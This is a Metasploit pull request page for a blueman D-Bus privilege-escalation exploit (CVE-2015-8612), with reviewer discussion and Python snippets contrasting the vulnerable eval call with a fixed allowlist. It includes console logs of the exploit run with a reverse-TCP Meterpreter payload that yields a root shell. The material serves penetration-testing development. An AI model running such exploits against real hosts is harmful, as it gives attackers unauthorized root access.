Add blueman set_dhcp_handler D-Bus Privilege Escalation #11169

Merged
merged 4 commits into from Jan 15, 2019

bcoles commented Dec 24, 2018

🎈 🎂 🎁 🎂 Happy third birthday CVE-2015-8612 🎂 🎁 🎂 🎈

Add blueman set_dhcp_handler D-Bus Privilege Escalation.

    This module attempts to gain root privileges by exploiting a Python
    code injection vulnerability in blueman versions prior to 2.0.3.

    The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
    `set_dhcp_handler` function which uses user input in a call to `eval`,
    without sanitization, resulting in arbitrary code execution as root.

    This module has been tested successfully with blueman version 1.23
    on Debian 8 Jessie (x64).

Output

msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ...
[*] Executing payload...
[*] Sending stage (861348 bytes) to 172.16.191.156
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.156:58863) at 2018-12-24 02:44:25 -0500
[+] Deleted /tmp/.DKJWL0TG7sm0M5

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : debian-8-1-x64.local
OS           : Debian 8.1 (Linux 3.16.0-4-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Notes

  • Yes, specifying multiple Arch architectures like this is dumb. We should fix it. (outside of this PR). See: #10994 (comment)

  • No, it doesn't support ARCH_PYTHON. Not for any good reason.
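As an added illustration (not blueman's code and not this module's), here are the two dispatch styles visible in the tracebacks quoted further down the thread, reduced to a stand-in handler: the pre-2.0.3 eval interpolation and the patched allowlist lookup. The `NetConf`, `DhcpdHandler` and `record_execution` names are assumed for the example.

```python
class NetConf:
    """Stand-in for blueman.main.NetConf (assumed): records the chosen handler."""

    def __init__(self):
        self.dhcp_handler = None

    def set_dhcp_handler(self, handler):
        self.dhcp_handler = handler


class DhcpdHandler:
    """Placeholder for one of blueman's DHCP handler classes (assumed name)."""


# Allowlist keyed by the D-Bus string, as in the patched traceback's DHCPDHANDLERS lookup.
DHCPDHANDLERS = {"DhcpdHandler": DhcpdHandler}

EXECUTED = []  # sentinel: non-empty means eval ran caller-supplied code


def record_execution():
    """Benign stand-in for whatever expression a caller injects into eval."""
    EXECUTED.append("caller-supplied expression evaluated")
    return DhcpdHandler


def enable_network_vulnerable(nc, dhcp_handler):
    """Pre-2.0.3 pattern: the D-Bus string is interpolated into eval verbatim."""
    eval("nc.set_dhcp_handler(%s)" % dhcp_handler)
    return nc.dhcp_handler


def enable_network_fixed(nc, dhcp_handler):
    """Patched pattern: the string is only ever a key into a fixed allowlist."""
    try:
        handler = DHCPDHANDLERS[dhcp_handler]
    except KeyError:
        raise ValueError("unknown DHCP handler: %r" % dhcp_handler)
    nc.set_dhcp_handler(handler)
    return nc.dhcp_handler


def demo(crafted="record_execution()"):
    """Feed the same crafted D-Bus argument to both versions; returns (ran, rejected)."""
    enable_network_vulnerable(NetConf(), crafted)
    ran = bool(EXECUTED)
    try:
        enable_network_fixed(NetConf(), crafted)
        rejected = False
    except ValueError:
        rejected = True
    return ran, rejected
```

With the same input the vulnerable version evaluates the caller's expression while the fixed version refuses anything outside the allowlist.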

h00die commented Jan 14, 2019

Debian 8.7.1
blueman 1.99~alpha1-1+deb8u1

msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[+] dbus-send is installed
[+] org.blueman.Mechanism.EnableNetwork D-Bus interface is available
[*] Writing '/tmp/.U6I1NzyNHHOh' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
Error org.freedesktop.DBus.Python.TypeError: Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/dbus/service.py", line 707, in _message_cb
    retval = candidate_method(self, *args, **keywords)
  File "<string>", line 2, in EnableNetwork
  File "/usr/lib/python2.7/dist-packages/blueman/plugins/mechanism/Network.py", line 73, in EnableNetwork
    nc.set_dhcp_handler(DHCPDHANDLERS[dhcp_handler])
TypeError: tuple indices must be integers, not dbus.String

[*] Exploit completed, but no session was created.

I believe check-valid-until didn't take; apt is saying it's expired still on 8.7.1, so maybe the patches were backported to 1.99.

h00die commented Jan 14, 2019

I believe check-valid-until didn't take; apt is saying it's expired still on 8.7.1, hence why 1.99 was installed instead of 1.23.

apt-get -o Acquire::Check-Valid-Until=false update did seem to work; not sure why the option in sources.list didn't...

h00die commented Jan 14, 2019

Works, just still getting that error thrown.

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:8143 
[+] dbus-send is installed
[+] org.blueman.Mechanism.EnableNetwork D-Bus interface is available
[*] Writing '/tmp/.CAeRfUBOCSWwh' (207 bytes) ...
[*] Max line length is 65537
[*] Writing 207 bytes in 1 chunks of 629 bytes (octal-encoded), using printf
[*] Executing payload...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (910632 bytes) to 2.2.2.2
Error org.freedesktop.DBus.Python.TypeError: Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/dbus/service.py", line 707, in _message_cb
    retval = candidate_method(self, *args, **keywords)
  File "<string>", line 2, in EnableNetwork
  File "/usr/lib/python2.7/dist-packages/blueman/plugins/mechanism/Network.py", line 70, in EnableNetwork
    eval("nc.set_dhcp_handler(%s)" % dhcp_handler)
  File "<string>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/blueman/main/NetConf.py", line 235, in set_dhcp_handler
    if not isinstance(self.dhcp_handler, handler):
TypeError: isinstance() arg 2 must be a class, type, or tuple of classes and types

[*] Meterpreter session 2 opened (1.1.1.1:8143 -> 2.2.2.2:60635) at 2019-01-14 12:12:02 -0500
[+] Deleted /tmp/.CAeRfUBOCSWwh

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : Debian 8.7 (Linux 3.16.0-4-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1529 created.
Channel 1 created.
apt-cache madison blueman
   blueman | 1.23-git201407171232-2 | http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie/main amd64 Packages
   blueman | 1.23-git201407171232-2 | http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie/main Sources

h00die commented Jan 14, 2019

Looks like, according to the Twitter post, that Python error is expected, and downstream of the exploit.
Part of me thinks something like vprint_status('The preceding line is expected, and is downstream of the exploit, therefore it is not indicative of exploit success -> TypeError: isinstance() arg 2 must be a class, type, or tuple of classes and types') would clarify this, but the other part of me thinks most people won't care as long as a shell opens.
However, if the exploit isn't successful, they may attribute the lack of shell to the Python error and a broken exploit, as opposed to the version not being vulnerable (especially if 1.99 has the patch backported).

@h00die h00die self-assigned this Jan 14, 2019

h00die commented Jan 14, 2019

Code all looks fine, pretty basic exploit, so just your call if you want to add a vprint or not. Let me know and I'll get this taken care of!

bcoles added some commits Jan 14, 2019

bcoles commented Jan 15, 2019

The Python error is expected. The user won't see it unless they set VERBOSE true.

If we go the vprint_status('The preceding line is expected, ... route, that implies they have a degree of confidence one way or another as to whether the target is vulnerable. In which case, we may as well add a conditional which prints a message to this effect, and let the user figure out the error message for themselves if they want to debug. In which case, we may as well check for it as well.

The bug was patched by replacing the call to eval. I've updated both check and exploit to check for eval("nc.set_dhcp_handler(%s)" % dhcp_handler) in the stack trace output.

Given that the exploit method calls check and compares CheckCode::Appears, if the target is not vulnerable, the exploit will never progress far enough for the user to see the Python error message, nor the Failure::NotVulnerable message, unless they set ForceExploit true.
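Added example (not the module's own code) of the version fingerprinting the comment above describes: classify the D-Bus error text by which dispatch line appears in it, mapping to the check result. The two sample traces are constructed from the outputs quoted earlier in this thread; the function and constant names are assumed.

```python
import re

# Unpatched builds dispatch through eval (Network.py line 70 in the quoted 1.23 trace).
VULNERABLE_MARKER = re.compile(r'eval\("nc\.set_dhcp_handler\(%s\)" % dhcp_handler\)')
# Patched builds dispatch through a dict lookup instead (Network.py line 73 in the 1.99 trace).
PATCHED_MARKER = re.compile(r"nc\.set_dhcp_handler\(DHCPDHANDLERS\[dhcp_handler\]\)")


def classify_trace(dbus_error_output):
    """Return 'Appears' (eval path seen), 'Safe' (allowlist path seen) or 'Unknown'.

    Mirrors the PR's updated check: the presence of the eval line in the
    stack trace, not the mere presence of an error, is what marks the target.
    """
    if VULNERABLE_MARKER.search(dbus_error_output):
        return "Appears"
    if PATCHED_MARKER.search(dbus_error_output):
        return "Safe"
    return "Unknown"


# Constructed from the blueman 1.23 output quoted in the thread (trimmed).
TRACE_1_23 = """Error org.freedesktop.DBus.Python.TypeError: Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/blueman/plugins/mechanism/Network.py", line 70, in EnableNetwork
    eval("nc.set_dhcp_handler(%s)" % dhcp_handler)
TypeError: isinstance() arg 2 must be a class, type, or tuple of classes and types
"""

# Constructed from the blueman 1.99~alpha1-1+deb8u1 output quoted in the thread (trimmed).
TRACE_1_99 = """Error org.freedesktop.DBus.Python.TypeError: Traceback (most recent call last):
  File "/usr/lib/python2.7/dist-packages/blueman/plugins/mechanism/Network.py", line 73, in EnableNetwork
    nc.set_dhcp_handler(DHCPDHANDLERS[dhcp_handler])
TypeError: tuple indices must be integers, not dbus.String
"""
```

Both builds raise a TypeError, which is why the error alone cannot be used as the success signal; only the eval line distinguishes them.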

@h00die h00die merged commit 8c636f2 into rapid7:master Jan 15, 2019

3 checks passed

  • Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  • Metasploit Automation - Test Execution: Successfully completed all tests.
  • continuous-integration/travis-ci/pr: The Travis CI build passed

h00die added a commit that referenced this pull request Jan 15, 2019

h00die commented Jan 15, 2019

That change did as expected; 1.99 failed and 1.23 worked!

h00die commented Jan 15, 2019

Release Notes

This PR adds the blueman set_dhcp_handler D-Bus Local Privilege Escalation exploit

@bcoles bcoles deleted the bcoles:blueman_set_dhcp_handler_dbus_priv_esc branch Jan 16, 2019

jmartin-r7 added a commit that referenced this pull request Jan 17, 2019
